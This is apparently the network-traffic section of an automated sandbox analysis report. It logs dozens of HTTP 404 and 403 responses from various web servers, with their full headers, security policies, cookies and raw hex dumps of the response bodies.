                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 05 Feb 2024 11:16:13 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedContent-Security-Policy: require-trusted-types-for 'script';report-uri /cspreportContent-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' https: http:;object-src 'none';base-uri 'self';report-uri /cspreportReport-To: {"group":"coop_gse_qebhlk","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_qebhlk"}]}Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_qebhlk"X-Content-Type-Options: nosniffX-XSS-Protection: 1; mode=blockServer: GSEAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Connection: close
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 05 Feb 2024 11:16:13 GMTContent-Type: text/html; charset=utf-8Content-Length: 52784Connection: closeVary: Originx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockx-content-type-options: nosniffx-download-options: noopenx-readtime: 13Strict-Transport-Security: max-age=15724800; includeSubDomains
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 05 Feb 2024 11:16:13 GMTContent-Type: text/htmlContent-Length: 7358Connection: closeServer: nginx/1.12.2Vary: Accept-EncodingETag: "5df8f9a3-1cbe"
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/html;charset=utf-8vary: Accept-Encodingset-cookie: sc-wcid=1b278517-6cee-4a55-8084-fc0802274316; Path=/; Domain=.snapchat.com; Expires=Tue, 06-Feb-2024 11:16:13 GMT; Max-Age=86400; Secureexpires: Thu, 01 Jan 1970 00:00:00 GMTstrict-transport-security: max-age=31536000; includeSubdomainsx-xss-protection: 1; mode=blockx-content-type-options: nosniffx-frame-options: allow-from https://iframe.arkoselabs.comcache-control: no-cache, no-store, max-age=0content-security-policy: default-src 'self'; script-src 'self' 'sha256-93ejg12EAT+6aW5hUFXASC0su+RZ+zOjgnJgLqJaLmY=' https://sc-static.net https://www.google-analytics.com https://www.googletagmanager.com https://snap-api.arkoselabs.com/ https://www.google.com/recaptcha/ https://www.google.com/js https://www.gstatic.com/ https://apis.google.com/ https://tr.snapchat.com/config/com/49966cac-c23c-49c7-9ff9-c7f8f6f771ba.js; font-src 'self' https://snapnet-cdn.storage.googleapis.com *.sc-cdn.net data:; style-src 'self' 'unsafe-inline' https://snapnet-cdn.storage.googleapis.com *.sc-cdn.net blob:; frame-src 'self' https://iframe.arkoselabs.com https://snap-api.arkoselabs.com https://tr.snapchat.com https://www.google.com/ https://client-api.arkoselabs.com/; connect-src 'self' https://graphql.contentful.com/content/v1/spaces/kp51zybwznx4/environments/master https://snap-api.arkoselabs.com/ https://tr.snapchat.com https://www.snapchat.com https://accounts.snapchat.com https://web-frontend-dot-sc-analytics.appspot.com https://us-central1-gcp.api.snapchat.com https://staging-us-central1-gcp.api.snapchat.com https://www.google-analytics.com https://sentry.sc-prod.net https://cdn.contentful.com/spaces/kp51zybwznx4/ https://accounts.snap.com/ https://web.snapchat.com/ https://gcp.api.snapchat.com https://story.snapchat.com https://aws.api.snapchat.com/snapchat.cdp.cof.CircumstancesService/targetingQuery https://aws.api.snapchat.com/snapchat.ab.exposure_service.ExposureService/BatchUpdateAbExposure https://chat-gold.sc-corp.net; img-src 'self' data: https://ssl.gstatic.com https://www.snapchat.com https://sc-oauth2-client-icons-dev.storage.googleapis.com https://sc-oauth2-client-icons.storage.googleapis.com https://storage.googleapis.com https://www.google-analytics.com https://images.ctfassets.net https://sdk.bitmoji.com; media-src 'self' https://storage.googleapis.com; form-action 'self' https://*.snap.com https://*.snapchat.com https://*.snap-dev.net https://*.sc-corp.net https://localhost:3000; frame-ancestors https://iframe.arkoselabs.com https://profile.softserve-local-prod.snap-dev.net https://preproduction-dot-snap-profile-manager.snapchat.com https://hotfix-dot-snap-profile-manager.snapchat.com https://snap-profile-manager.snapchat.com https://profile-preprod.snapchat.com https://business-preprod.snapchat.com https://profile.snapchat.com https://business.snapchat.com https://enterprise.snap.com;x-content-security-policy: default-src 'self'; script-
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Founddate: Mon, 05 Feb 2024 11:16:12 GMTx-content-type-options: nosniffx-xss-protection: 1;mode=blockcache-control: no-cache, privatetransfer-encoding: chunkedcontent-type: text/html; charset=UTF-8x-frame-options: SAMEORIGINconnection: close
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 05 Feb 2024 11:16:13 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedContent-Security-Policy: require-trusted-types-for 'script';report-uri /cspreportContent-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' https: http:;object-src 'none';base-uri 'self';report-uri /cspreportReport-To: {"group":"coop_gse_qebhlk","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_qebhlk"}]}Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_qebhlk"X-Content-Type-Options: nosniffX-XSS-Protection: 1; mode=blockServer: GSEAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Connection: close
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 05 Feb 2024 11:16:13 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachewww-authenticate: Basic realm="EnterPassword"x-frame-options: SAMEORIGINx-turbo-charged-by: LiteSpeedCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=oX1Wysvm258tZWuiG2lXX4QoiNwYfmvfoY7RCwZAntGRcVj9pC8Ct4G4qdMZ3u3doyd%2FxcZocj5xmiuEZ%2B5%2FKSvK%2FzPJZ2A%2BPSr1aUesYdB0KTGjBjPWOjjF15f4XdE%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 850abd710da9b0ee-ATLalt-svc: h3=":443"; ma=86400
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 05 Feb 2024 11:16:13 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 05 Feb 2024 11:16:13 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedContent-Security-Policy: require-trusted-types-for 'script';report-uri /cspreportContent-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' https: http:;object-src 'none';base-uri 'self';report-uri /cspreportReport-To: {"group":"coop_gse_qebhlk","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_qebhlk"}]}Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_qebhlk"X-Content-Type-Options: nosniffX-XSS-Protection: 1; mode=blockServer: GSEAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Connection: close
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 05 Feb 2024 11:16:13 GMTContent-Type: text/htmlContent-Length: 7358Connection: closeServer: nginx/1.12.2Vary: Accept-EncodingETag: "5df8f9a3-1cbe"
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeContent-Type: text/htmlNgrok-Error-Code: ERR_NGROK_3200Ngrok-Trace-Id: 6f775cd5dd0c092eb62fa3f5c7333771Referrer-Policy: no-referrerDate: Mon, 05 Feb 2024 11:16:13 GMTTransfer-Encoding: chunked
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-powered-by: PHP/8.1.26expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8link: <https://mobilsam.com/wp-json/>; rel="https://api.w.org/"x-litespeed-cache-control: public,max-age=3600x-litespeed-tag: 106_HTTP.404,106_404,106_URL.0045a36e9aa35622a617ea518918c32d,106_x-litespeed-cache: misstransfer-encoding: chunkeddate: Mon, 05 Feb 2024 11:16:13 GMTserver: LiteSpeedplatform: hostingercontent-security-policy: upgrade-insecure-requestsalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/10.0X-Powered-By: ASP.NETStrict-Transport-Security: max-age=31536000; includeSubDomainsDate: Mon, 05 Feb 2024 11:16:12 GMTConnection: closeContent-Length: 1245X-CDN: ImpervaX-Iinfo: 3-31484936-31484965 NNNY CT(118 135 0) RT(1707131773054 398) q(0 0 0 -1) r(0 1) U24
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 05 Feb 2024 11:16:13 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=OnqRHQ2azDFaFwyxwOdel74%2FugULTjZXjHMOtC6jKS2%2BLBjoQfNIPvC98bn6Zr30Scemkg%2BAzM0oyGl%2BSFz8eF%2FiDrt3kQdUaif93N5IUhKGFzrPF1wDylRfKBqS5pCrY3ENYAYciMHUtXE%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 850abd6fccbdb121-ATL
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeserver: envoydate: Mon, 05 Feb 2024 11:16:13 GMTcontent-security-policy: frame-ancestors https://*.booking.com 'self'; report-uri https://nellie.booking.com/csp-report-uri?type=block&tag=212&pid=3c384f3e96cf001b&e=UmFuZG9tSVYkc2RlIyh9YSWKtKO5TxgOpTwVTPfHZKNW3Hcrm1RLgTofTsWVfilM28zDN-eA-X1rEpLDxs1ICqaeiDPezNiIcontent-security-policy-report-only: base-uri 'none'; connect-src saa.booking.com secure.booking.com reports.booking.com privacyportal-eu.onetrust.com geolocation.onetrust.com cdn.cookielaw.org www.google-analytics.com *.perimeterx.net *.pxchk.net *.px-cdn.net *.px-client.net *.px-cloud.net 'self' 'report-sample'; default-src *.bstatic.com bstatic.com 'self'; frame-src https://www.youtube.com/embed/Vv4w5SmRkss *.bstatic.com https://www.google.com bstatic.com www.booking.com secure.booking.com paymentcomponent.booking.com 'self'; img-src 'self' data: www.booking.com graph.facebook.com cdn.cookielaw.org account.booking.com *.bstatic.com bstatic.com *.static.booking.cn www.google-analytics.com www.google.com stats.g.doubleclick.net *.px-cloud.net *.perimeterx.net www.gstatic.com; object-src 'none'; report-uri https://nellie.booking.com/csp-report-uri?type=report&tag=213&pid=3c384f3e96cf001b&e=UmFuZG9tSVYkc2RlIyh9YSWKtKO5TxgOpTwVTPfHZKNW3Hcrm1RLgTofTsWVfilM28zDN-eA-X1rEpLDxs1ICqaeiDPezNiI; script-src saa.booking.com *.bstatic.com bstatic.com *.static.booking.cn www.google.com www.google-analytics.com cdn.cookielaw.org geolocation.onetrust.com 'self' 'nonce-8CkX0tTN0wISZS0' 'report-sample'; style-src *.bstatic.com bstatic.com *.static.booking.cn 'self' 'unsafe-inline'x-xss-protection: 1; mode=blockstrict-transport-security: max-age=86400; includeSubDomainsX-Cache: Error from cloudfrontVia: 1.1 7e1e27db89c10c5d284149b3df2ae272.cloudfront.net (CloudFront)X-Amz-Cf-Pop: ATL59-P5X-Amz-Cf-Id: WaBxQvY1IzXgA6EPIUuZY34uXiY6D_8EhwMer05u_ZrTDrz8AQf6bQ==
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 05 Feb 2024 11:16:13 GMTContent-Type: text/html;charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingSet-Cookie: PHPSESSID=h22ommkr94dg2i4eebha6sl5bj; path=/Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cache
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 05 Feb 2024 11:16:14 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2BjkoOWZ0aBem6AH8WAvzXc0h0iQESsyVcAZb4EUccLIMLZ8JpcnIj3yJnBkU5bOcsc9jo0diWOiBMvwxCWdyez%2FiJ2zMW17Bx7JXW24%2BS130hrnklGaCarHdJbE1S%2B927QigFvX1iYI%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 850abd71ead2678b-ATLalt-svc: h3=":443"; ma=86400
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 05 Feb 2024 11:16:13 GMTContent-Length: 0Connection: closeVary: Accept-Encoding
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeserver: envoydate: Mon, 05 Feb 2024 11:16:13 GMTcontent-security-policy: frame-ancestors https://*.booking.com 'self'; report-uri https://nellie.booking.com/csp-report-uri?type=block&tag=212&pid=7ca24f3e5c1e003d&e=UmFuZG9tSVYkc2RlIyh9YSWKtKO5TxgOpTwVTPfHZKNW3Hcrm1RLgfwAYFouQ6BkipNeG7KLRLX-Kzp6iEpSvg81iKjTx_Jvcontent-security-policy-report-only: base-uri 'none'; connect-src saa.booking.com secure.booking.com reports.booking.com privacyportal-eu.onetrust.com geolocation.onetrust.com cdn.cookielaw.org www.google-analytics.com *.perimeterx.net *.pxchk.net *.px-cdn.net *.px-client.net *.px-cloud.net 'self' 'report-sample'; default-src *.bstatic.com bstatic.com 'self'; frame-src https://www.youtube.com/embed/Vv4w5SmRkss *.bstatic.com https://www.google.com bstatic.com www.booking.com secure.booking.com paymentcomponent.booking.com 'self'; img-src 'self' data: www.booking.com graph.facebook.com cdn.cookielaw.org account.booking.com *.bstatic.com bstatic.com *.static.booking.cn www.google-analytics.com www.google.com stats.g.doubleclick.net *.px-cloud.net *.perimeterx.net www.gstatic.com; object-src 'none'; report-uri https://nellie.booking.com/csp-report-uri?type=report&tag=213&pid=7ca24f3e5c1e003d&e=UmFuZG9tSVYkc2RlIyh9YSWKtKO5TxgOpTwVTPfHZKNW3Hcrm1RLgfwAYFouQ6BkipNeG7KLRLX-Kzp6iEpSvg81iKjTx_Jv; script-src saa.booking.com *.bstatic.com bstatic.com *.static.booking.cn www.google.com www.google-analytics.com cdn.cookielaw.org geolocation.onetrust.com 'self' 'nonce-vONTvDDlfmHoPD9' 'report-sample'; style-src *.bstatic.com bstatic.com *.static.booking.cn 'self' 'unsafe-inline'x-xss-protection: 1; mode=blockstrict-transport-security: max-age=86400; includeSubDomainsX-Cache: Error from cloudfrontVia: 1.1 57674a900f587a3a1f1571205e001c6c.cloudfront.net (CloudFront)X-Amz-Cf-Pop: ATL59-P5X-Amz-Cf-Id: vwkqfs6A3ra1GuWD7jumUwQvjZKkyh_pHCMBRKhB-rAiIRhUbZ_2wQ==
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 05 Feb 2024 11:16:14 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closex-powered-by: PHP/7.0.33-6+ubuntu14.04.1+deb.sury.org+3expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatepragma: no-cacheset-cookie: warriorplus=giequ27s2rlgl173cf4omrgtg5; expires=Wed, 06-Mar-2024 11:16:13 GMT; Max-Age=2592000; path=/set-cookie: rqtok=cc06cf2a2b3b701ce398; expires=Tue, 06-Feb-2024 11:16:13 GMT; Max-Age=86400; path=/set-cookie: TOKEN=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/set-cookie: TOKEN=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/set-cookie: PASSWORD=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/set-cookie: PASSWORD=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/set-cookie: notifications=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/set-cookie: notifications_aff=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/set-cookie: notifications_sales=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/set-cookie: wpg=gw1s33s7p59ds9s2; expires=Tue, 04-Feb-2025 11:16:13 GMT; Max-Age=31536000; path=/set-cookie: wpg=gw1s33s7p59ds9s2; expires=Tue, 04-Feb-2025 11:16:13 GMT; Max-Age=31536000; path=/
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 05 Feb 2024 11:12:18 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 37 0d 0a 03 00 00 00 1f 3d 53 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=S0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 05 Feb 2024 11:12:18 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 73 65 6c 65 62 72 61 74 69 6f 6e 31 37 69 6f 2e 69 6f 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at selebration17io.io Port 80</address></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 05 Feb 2024 11:12:18 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 66 36 36 0d 0a 00 00 b4 60 13 d4 0c 1a 40 10 16 30 80 b7 d3 87 84 4f 15 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 65 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 55 9e 7e 29 fc 53 68 0b 8e 22 f5 86 55 d4 a3 86 04 12 fc 2a 54 e9 30 16 c7 37 f2 78 06 0d d2 1f db de fa e0 fd 87 71 cd 37 33 33 99 11 0c 45 7c 0f 57 44 8d e8 be 3c 50 35 11 fe 08 32 b9 7f 18 64 3d 28 2c 87 6a dd d6 be db 43 17 5c 53 a6 cd f6 4d 55 64 b1 ce 5b fd 51 19 d0 b3 4e 2a b1 15 22 18 cb 33 4f 72 3e 15 31 0b 5a a3 06 83 3a 56 2f cb 00 23 be 42 15 c7 07 53 53 fa cb 1f 9e 1d 09 52 2b e1 a3 15 7b 1a 45 f7 ff 78 2d c2 db d4 77 11 13 bf 1e e1 92 24 08 4f c5 03 bb 91 a1 39 64 de f5 69 39 8e 17 1e 45 af 9a a5 44 c9 a0 c1 b9 dd 7a 0d 90 4e 19 e0 2c 95 a9 18 1a f5 96 be 25 51 61 9a d4 3e 7c 88 28 c8 48 6b a1 c0 4a 9a 03 fd ec 9e aa 7b ac 87 2f bd 61 0d 30 62 bf aa 35 fd f8 12 6c 33 6c 29 7c 0a 8d c7 fd e4 0e a4 eb 7e 71 eb 80 f5 1a 68 9b 4a d8 37 da a9 37 4f 79 82 ae 35 b6 04 4c 75 46 ad f3 57 3b 2a b9 72 ee cc 23 b2 75 0e 31 79 92 90 f7 df f5 ec e7 52 2b 4c e0 fe 60 9d 72 17 70 bb d6 91 24 3c 27 d4 29 b1 9f 33 c9 cc 46 d9 48 15 ac af eb d9 55 3d af ba 68 92 0e ff 9d 3f 7f 55 00 79 00 1a 4d 07 e7 ac 04 c8 30 43 40 77 fb c1 9b 84 e7 3d 66 f1 8a 64 b1 1d 30 12 51 8c 70 17 4b 81 6b df 8e c2 01 e8 24 31 28 cc e0 0e 92 b6 d7 52 4a 80 1b 6f e3 c3 29 32 28 e7 5b 1e 54 ab 1e 26 7d 11 ee c3 ce 57 a3 4c 1d 85 1f f4 5c 68 f1 b2 5f 6b 81 6c 6d 4c 81 cb e6 1f e4 a6 8d 2f 9f 10 bd d9 b0 99 03 99 8a cd e4 7f 74 79 50 6d 43 cc b9 8b 8b a1 62 7a 17 b2 fe ae 90 6b 9a 56 39 d1 03 40 28 d2 ae 06 1f d0 db fd 7a 8f fe 6b e3 cd d0 d9 37 00 80 e3 1c c9 20 f5 52 68 c4 3a f6 63 b9 82 7b 50 bf e5 7e 2d bc 70 d4 03 6b 3b 98 76 72 0f ca 82 4d 72 2e 9f 96 ce ec 35 98 c3 a7 0d a8 ca d4 1f 29 43 03 b2 27 70 10 7b 3a 1d f8 50 d0 ac 88 c1 64 36 33 25 01 d8 a9 c3 76 9f 2f cb e2 09 e8 8b 23 1e ac 18 b8 77 b3 4e 93 81 59 13 88 b9 8c f5 18 97 52 b9 c1 ea 9e 13 e8 b8 4c 45 e1 f0 73 8d 43 d9 ed 07 b2 52 dc 1a 9e 8b 18 57 21 01 7d 42 03 81 96 7f d8 2e 27 9d df 3c 42 56 60 de 9e 73 0f b6 65 a2 25 1f 78 60 38 30 5f d6 a6 b8 78 fe b1 8e 98 6d 18 5e 32 d0 e9 f3 32 42 c2 39 16 12 47 0b e9 17 10 8d e3 51 20 b2 3d db 10 54 5a 17 1c 5c 5a 16 b3 19 5f 11 8f 69 f9 e4 39 2a 01 6e f1 fd 58 b3 dc 95 25 1c 90 53 72 5e 15 33 b5 01 82 e3 92 c2 01 6d 7e d3 85 bc 43 cf 76 62 93 45 e1 05 85 d4 9c 97 2e 60 10 3a 93 8b 94 e5 fe d6 ae 32 c8 6e d5 8d 4a ad fb 91 65 69 17 ee f3 af 84 ed 67 e1 a2 3a 84 aa 58 5d 1c 79 9b 37 67 d2 1f ad af ac d5 54 24 d1 e4 dd b2 3a 6a c0 8e ad 90 bb 9a 05 71 77 92 ae 0f 27 d1 9c 65 53 55 cd ab 48 63 36 cc 82 8e 82 a4 9e 9c bf cb b
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 05 Feb 2024 11:12:22 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 73 65 6c 65 62 72 61 74 69 6f 6e 31 37 69 6f 2e 69 6f 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at selebration17io.io Port 80</address></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 05 Feb 2024 11:12:22 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 66 36 36 0d 0a 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 ed 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 8e 39 bf 78 97 a6 a9 11 3b f6 52 dd e7 65 8e 1e 0d d3 13 3f 14 5b 63 17 9e 67 ac 9c cf 95 88 de af bc 62 a8 01 bd ec a9 95 32 96 d1 46 97 ea 13 19 80 03 92 61 c4 86 c5 54 53 7e 30 c6 1c 60 ae 6f 88 72 4b dd 54 f6 b8 1a 45 72 b6 ed f7 a2 3d bf 6c 13 d9 06 80 e3 a7 33 4f 62 3e 15 21 0b 5a a3 06 93 3a 56 3f cb 00 23 be 42 15 d7 07 53 53 aa 8e 1f 9e 51 08 55 2b 98 c3 00 1f 7e 45 f7 ff 78 8d 55 db 24 0d 10 12 b4 1f eb 92 24 12 52 c5 03 45 ca a1 61 7e de f5 45 af 19 17 7e 4f af 9a a5 74 d4 a0 c1 b9 9d 7a 0d 80 4e 19 e0 2e 95 a9 1d 1a f4 96 be 25 51 61 9f d4 3f 7c 88 28 c8 48 6b 91 df 4a 9a 07 